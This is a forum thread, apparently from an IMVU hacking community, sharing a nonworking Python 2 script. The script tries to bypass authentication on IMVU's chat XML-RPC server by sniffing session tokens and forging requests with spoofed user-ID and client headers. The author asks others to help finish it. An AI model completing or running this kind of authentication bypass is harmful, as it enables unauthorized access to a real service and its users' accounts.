VOLKERGEIST XML/RCP XSRF chat bot (2.0) - 0day (nonworking)

Exploit
by Exploit · 2 posts
8 years ago in Python
Posted 8 years ago · Author
I need you, skilled python coders to help me~! this project is huge ;)

Read the dox first.

I had previously asked both admins about working on this and they attempted to help. I am now bringing the code out into the open for people to read and fork.

It does not work without the graveyard library, which is not distributed in this code. This "release" is in hopes skilled coders will be able to help me continuing my work.

Please note this is Python 2.7.x

[code=python file=ghost.py]
#!/usr/bin/python -O
#
# IMVUGhost 2.0 codename: VolkerGeist
#
# forked from dreamdatabses horrible imvu bot that would never have worked - http://pastebin.com/q70DgpTn
#
#
# Bypassing Authentcation:
# Idea #1:
# ATTEMPTED - NOT WORKING
# check if imvu running > if not start it
# start packet sniffer w/ xml filter, dump into temp text file
# while packet sniffer is running, add a threaded function to read the contents of the capture hunting for the string after If-None Match: jrc-
# make sure to capture a new one of these every 3-4 minutes.
# use string from threaded function to parse packets
# send string as authnetication for packets
#
#Current chat server: http://chat.imvu.com/api/xmlrpc/chat.php
#
#Update:
# PARSED XML IS 100% ACCURATE! Only thing that i need now is to bypass authentication, i can make requests, but they don not work
#
#Response:
#200 OK Data: <?xml version="1.0" encoding="UTF-8"?>
#<methodResponse>
# <fault>
# <value>
# <struct>
# <member>
# <name>faultCode</name>
# <value><int>30</int></value>
# </member>
# <member>
# <name>faultString</name>
# <value><string>client error. invalid authorization data for chat.checkForInvite2.</string></value>
#
# Which is the same error received before in previous (broken) versions of GHOST
#
#
#
#
# _____ __ __ _____ ____ _____ _______ _____
# |_ _| \/ | __ \ / __ \| __ \__ __/ ____|
# | | | \ / | |__) | | | | |__) | | | | (___
# | | | |\/| | ___/| | | | _ / | | \___ \
# _| |_| | | | | | |__| | | \ \ | | ____) |
# |_____|_| |_|_| \____/|_| \_\ |_| |_____/
import time
import httplib
import urllib
import os
#import gui
import sys
from os import system as sysc
# .-.
#(o o)
#| O \
import graveyard
# \ \
# `~~~'
#graveyard contains all the spells hehe!
g = graveyard
# ALL HAIL G!
import threading
import string
import random
#uneeded gui shit
#from PySide.QtCore import *
#from PySide.QtGui import *
#import hashlib
#test = g.generatehash()
lst = ''
temp = ''
spell = ''
hashh = ''
def clear(object):
object = ''
return object
def randomhex():
global lst, hashh
hashh = ''
lst = ''
lst = [random.choice(string.ascii_lowercase + string.digits) for n in xrange(33)]
hashh = "".join(lst)
return hashh
#variables from beyond the grave!
g.user = '1337'
g.room = '14432-32'
g.message = ''
g.lastmessage = ''
# _____ _ _ ____ _____ _______ _____
# / ____| | | |/ __ \ / ____|__ __/ ____|
# | | __| |__| | | | | (___ | | | (___
# | | |_ | __ | | | |\___ \ | | \___ \
# | |__| | | | | |__| |____) | | | ____) |
# \_____|_| |_|\____/|_____/ |_| |_____/
#boot spell - user
sumboot = g.summonboot()
#make new chat - user / room
sumgetmakechat = g.summongetmake()
#send new message - message / user / room
sumsendmesg = g.summonsend()
#get last message - last message /user / room
sumgetnewmesg = g.summongetmessage()
#ping spell
sumping = g.summonping()
#whisper spell - to_user / message / user / room
sumwhisper = g.sumwhisper()
# extra
lol = g.lol()
quad = g.boom()
spellist = [sumgetnewmesg, sumping,sumgetmakechat,sumsendmesg,sumgetnewmesg]
##############################################################
# __ __ _____ _ _
# | \/ | /\ |_ _| \ | |
# | \ / | / \ | | | \| |
# | |\/| | / /\ \ | | | . ` |
# | | | |/ ____ \ _| |_| |\ |
# |_| |_/_/ \_\_____|_| \_|
##############################################################
RHOST = "chat.imvu.com"
conx = httplib.HTTPConnection(RHOST)
params = urllib.urlencode({'@number': 12524, '@type': 'issue', '@action': 'show'})
headers = {"Content-type": "text/xml", "Accept": "text/plain", "Host": "chat.imvu.com", "Accept-Encoding": "identity", "User-agent": "IMVU Client/491 Python-urllib/2.6", "X-imvu-userid": "39",}
hextemp = 'jrc-%s'%hashh
headers["If-none-match"] = str(hextemp)
def ping():
global conx, sumping, data
print("[*] Channeling spirits from "+RHOST+"/api/xmlrpc/chat.php...") #HTTP Connexion
print("[*] Crafting spell for 204.225.145.35...")
print "[!] Casting...\n\n"
conx.request("POST", "/catalog/skudb/chat.php",sumping, headers)
r = conx.getresponse()
data = r.read()
#print data
if r.status == 200 and "fault"not in r.reason:
print ('[!] Response:\n\n'),'HTTP Status:',r.status,r.reason,'\n\n[*] Packet data:\n\n',data,conx.close()
else:
print 'Reqest failed with error:\n'
print r.status,r.reason

#cast is a function that will take any spell and send it off
def cast(spell):
# global g.user,g.room,g.message,g.lastmessage,RHOST
print("[+]Casting spell on "+RHOST+"/api/xmlrpc/chat.php...")
conx.request("POST", "/catalog/api/xmlrpc/chat.php",spell, headers)
r = conx.getresponse()
data = r.read()
print data
if r.status == 200 or r.reason == "OK":
print ('Request successful\nResponse:\n'),r.status,r.reason,'Data:',data,conx.close()
else:
print 'Reqest failed with error:\n'
print r.status,r.reason
#threaded version of cast, not sure how to use it...lol
class threadrq(threading.Thread):
def run(self):
def cast(spell):
#global g.user,g.room,g.message,g.lastmessage,RHOST <-- wtf were you thinking this was never gonna be valid
print("[*]Casting spell on "+RHOST+"/api/xmlrpc/chat.php...")
conx.request("POST", "/catalog/skudb/chat.php",spell, headers)
r = conx.getresponse()
data = r.read()
print data
if r.status == 200 or r.reason == "OK":
print ('Request successful\nResponse:\n'),r.status,r.reason,'Data:',data,conx.close()
else:
print 'Reqest failed with error:\n'
print r.status,r.reason

#threadrq().start().cast(spell)? maybe?

#threw all the test stuff into its own function
def testit():
print '\n[!] TEST: Displaying Headers:\n'
print headers
#print sumboot
print '\n[*] We are using :',threading.activeCount(),' memory thread(s)\n'
if "1337" in sumgetnewmesg and sumping and sumgetmakechat and sumsendmesg and sumgetmakechat and sumgetnewmesg:
print '[!] Correct user id:%s found in ALL summon spells\n\n\n\n[!] Congrats, XML can correctly be parsed and sent!\n'%(g.user)
#print '[!]Testing threaded request, expect an error, long as it works its all good.'
q = raw_input('Shall we run a few tests? (y/n)')
if q == 'y':
print '[!] TEST: Looking for UserID 1337 in packets'
g.user = '1337'
g.room = '433-23232'
testit()
print '[!] TEST: Attempting to connect to imvu....expect it to fail..\n\n\n'
ping()
else:
os._exit(-1)[/code]
Posted 8 years ago
I am still learning python. but this is very interesting. ill have to read the dox. thnx for sharing with us. ive been using some tools in kali-linux and windows. such as wireshark & burpsuite. i have gatherd alot of useful api's imvu have layed around. including the one mention in your Dox. the chat server. so as this is not so much of suprised. its more of excitement. lol.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Sign in

Already have an account? Sign in here

SIGN IN NOW

Create an account

Sign up for a new account in our community. It's easy!

REGISTER A NEW ACCOUNT
Select a forum Protection     Help & Support     Introductions     Mafia News     IMVU News General Discussion     IMVU Lounge        IMVU Series / Roleplaying        Social Games     Mafia Market     Mafia Tools        Premium IMVU Tools        Off Topic Tools     Off Topic     Contests Creator Corner     Graphics Design        Photoshop        GIMP     Basic Creator Help     Catalog And Product Showcase     3D Meshing        3Ds Max        Sketchup        Blender Gangsters with Connections     White Hat Activities        Google Hacking        Trackers Programming Corner     Coding        Python        .Net (C#, VB, etc)        Flash        JAVA        Autoit        Batch        HTML & CSS        Javascript        PHP        Other        IMVU Homepage Codes           General           About me Panel           Messages Panel           Special Someone Panel           Visitors Panel           New Products Panel           Rankings Panel           Wishlist Panel           My Badges Panel           Outfits Panel           Url Panel           Groups Panel           Slideshow Panel           My Room Panel           Sandbox panel           Layouts     Help & Requests Free Credits     Approved Methods     Submit Methods Free Money     Approved Methods     Submit Methods Adult Corner     Get Mafia AP Here     AP Lounge        AP Social Games        Casual Dating Tips     IMVU Slave Market & Escorts